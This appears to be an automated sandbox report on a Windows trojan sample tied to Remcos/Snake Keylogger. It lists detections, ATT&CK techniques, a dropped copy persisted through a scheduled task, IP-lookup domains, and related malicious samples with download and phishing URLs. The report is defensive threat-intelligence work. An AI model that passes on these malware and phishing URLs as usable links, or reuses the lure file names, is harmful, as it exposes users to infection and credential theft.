Source: Yara match	File source: 00000006.00000002.1821617182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1875749509.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1734665410.0000000004501000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1784692461.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1824025899.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2120, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: NPadpxkCGKGoat.exe PID: 7236, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7380, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	311 Process Injection	1 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	31 Obfuscated Files or Information	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	22 Software Packing	DCSync	12 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.Remcos
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.Remcos

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.96.3	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false		high
http://checkip.dyndns.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://www.apache.org/licenses/LICENSE-2.0	file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com	file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designersG	file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/?	file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn/bThe	file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers?	file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.tiro.com	file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	RegSvcs.exe, 00000006.00000002.1824025899.0000000003239000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.0000000003303000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.000000000328B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.00000000032F6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.0000000003311000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.00000000032DB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.00000000032E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.0000000003248000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.000000000333F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.0000000003331000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002DDB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002D48000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002DF5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002E30000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers	file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.goodfont.co.kr	file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	file.exe, NPadpxkCGKGoat.exe.0.dr	false	high
http://www.carterandcone.coml	file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sajatypeworks.com	file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.typography.netD	file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/cabarga.htmlN	file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn/cThe	file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.galapagosdesign.com/staff/dennis.htm	file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn	file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/frere-user.html	file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	file.exe, 00000000.00000002.1734665410.0000000004501000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1821617182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, NPadpxkCGKGoat.exe, 00000008.00000002.1784692461.0000000003E04000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.jiyu-kobo.co.jp/	file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189$	RegSvcs.exe, 00000006.00000002.1824025899.0000000003303000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.000000000328B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.00000000032F6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.00000000032DB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.00000000032E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.000000000333F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.0000000003331000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002DDB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002DF5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002E30000.00000004.00000800.00020000.00000000.sdmp	false	high
http://reallyfreegeoip.org	RegSvcs.exe, 00000006.00000002.1824025899.0000000003303000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.00000000032F6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.00000000032DB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.0000000003260000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.00000000032E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.000000000333F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.0000000003331000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002DDB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002DF5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002E30000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.galapagosdesign.com/DPlease	file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	RegSvcs.exe, 00000006.00000002.1824025899.0000000003303000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.000000000328B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.00000000032F6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.00000000032DB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.00000000032E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.0000000003248000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.000000000333F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.0000000003331000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002DDB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002D48000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002DF5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002E30000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers8	file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fonts.com	file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sandoll.co.kr	file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.com	RegSvcs.exe, 00000006.00000002.1824025899.0000000003303000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.00000000032F6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.00000000032DB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.00000000032E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.0000000003248000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.000000000333F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.0000000003331000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002DDB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002D48000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002DF5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002E30000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.urwpp.deDPlease	file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.zhongyicts.com.cn	file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	file.exe, 00000000.00000002.1733189829.0000000003016000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.0000000003181000.00000004.00000800.00020000.00000000.sdmp, NPadpxkCGKGoat.exe, 00000008.00000002.1782802896.00000000025A9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002C81000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sakkal.com	file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	file.exe, 00000000.00000002.1734665410.0000000004501000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1821617182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.0000000003248000.00000004.00000800.00020000.00000000.sdmp, NPadpxkCGKGoat.exe, 00000008.00000002.1784692461.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002D48000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	reallyfreegeoip.org	European Union		13335	CLOUDFLARENETUS	false
132.226.247.73	checkip.dyndns.com	United States		16989	UTMEMUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583473
Start date and time:	2025-01-02 20:22:59 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@26/12@2/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 97% Number of executed functions: 199 Number of non-executed functions: 32
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27, 4.245.163.56, 20.109.210.53, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target RegSvcs.exe, PID 2120 because it is empty
Execution Graph export aborted for target RegSvcs.exe, PID 7380 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
14:23:51	API Interceptor	1x Sleep call for process: file.exe modified
14:23:54	API Interceptor	17x Sleep call for process: powershell.exe modified
14:23:56	API Interceptor	153x Sleep call for process: RegSvcs.exe modified
14:23:57	API Interceptor	1x Sleep call for process: NPadpxkCGKGoat.exe modified
19:23:56	Task Scheduler	Run new task: NPadpxkCGKGoat path: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/u7ghXEYp/download
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/1a34/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.mydreamdeal.click/1ag2/
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	www.questmatch.pro/ipd6/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/I7fmQg9d/download
	need quotations.exe	Get hash	malicious	FormBook	Browse	www.rtpwslot888gol.sbs/jmkz/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/Bh1Kj4RD/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/XrlEIxYp/download
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/XrlEIxYp/download
132.226.247.73	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	Dotc67890990.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Invoice DHL - AWB 2024 E4001 - 0000731.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	PURCHASE ORDER TRC-090971819130-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	D.G Governor Istek,Docx.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	0001.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	ugpJX5h56S.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Shipment 990847575203.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	PO_4027_from_IC_Tech_Inc_6908.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	PO_KB#67897.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	Dotc67890990.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
checkip.dyndns.com	file.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	file.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	PO_4027_from_IC_Tech_Inc_6908.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	PO_KB#67897.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	ZOYGRL1ePa.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	158.101.44.242

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	PO_4027_from_IC_Tech_Inc_6908.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	https://share.hsforms.com/1ERkb7-8BRoi6cEFhMJVsvgt08ok	Get hash	malicious	HTMLPhisher	Browse	104.18.142.119
	https://ntta.org-pay-u5ch.sbs/us/	Get hash	malicious	Unknown	Browse	104.18.26.193
	https://midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com/open/message_12832.html	Get hash	malicious	HTMLPhisher	Browse	172.66.0.235
	https://bit.ly/3W6tVJJ?BRK=80HiTWCpll	Get hash	malicious	Unknown	Browse	172.66.0.227
	https://klickskydd.skolverket.org/?url=https%3A%2F%2Fwww.gazeta.ru%2Fpolitics%2Fnews%2F2024%2F12%2F22%2F24684722.shtml&id=71de&rcpt=upplysningstjansten@skolverket.se&tss=1735469857&msgid=b53e7603-c5d3-11ef-8a2e-0050569b0508&html=1&h=ded85c63	Get hash	malicious	HTMLPhisher	Browse	104.26.9.117
UTMEMUS	DEMONS.ppc.elf	Get hash	malicious	Unknown	Browse	132.226.227.252
	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	Dotc67890990.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	PARATRANSFARI REMINDER.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	Invoice DHL - AWB 2024 E4001 - 0000731.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	PURCHASE ORDER TRC-090971819130-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	F.O Pump Istek,Docx.bat	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	D.G Governor Istek,Docx.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	132.226.247.73

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	PO_4027_from_IC_Tech_Inc_6908.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	NL Hybrid.exe	Get hash	malicious	Titanium Proxy, PureLog Stealer	Browse	188.114.96.3
	NL Hybrid.exe	Get hash	malicious	Titanium Proxy, PureLog Stealer	Browse	188.114.96.3
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	RtU8kXPnKr.exe	Get hash	malicious	Quasar	Browse	188.114.96.3

Process:	C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:ML9E4KiE4Kx1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MxHKiHKx1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	8B21C0FDF91680677FEFC8890882FD1F
SHA1:	E15AC7685BFC89F63015C29DE7F6BCE7A1A9F0E7
SHA-256:	E2F188397C73C8150EE6F09E833E4D1ABA01293CCFDFED61981F5F66660731F9
SHA-512:	1EFDF56115A8688CA2380F3047A28CA3E03C74369C3A377050066A56B8171AD756F7DD7AA29F5648A84D16812D1B422749259ED47447713E9B3A0834CE361BE7
Malicious:	false
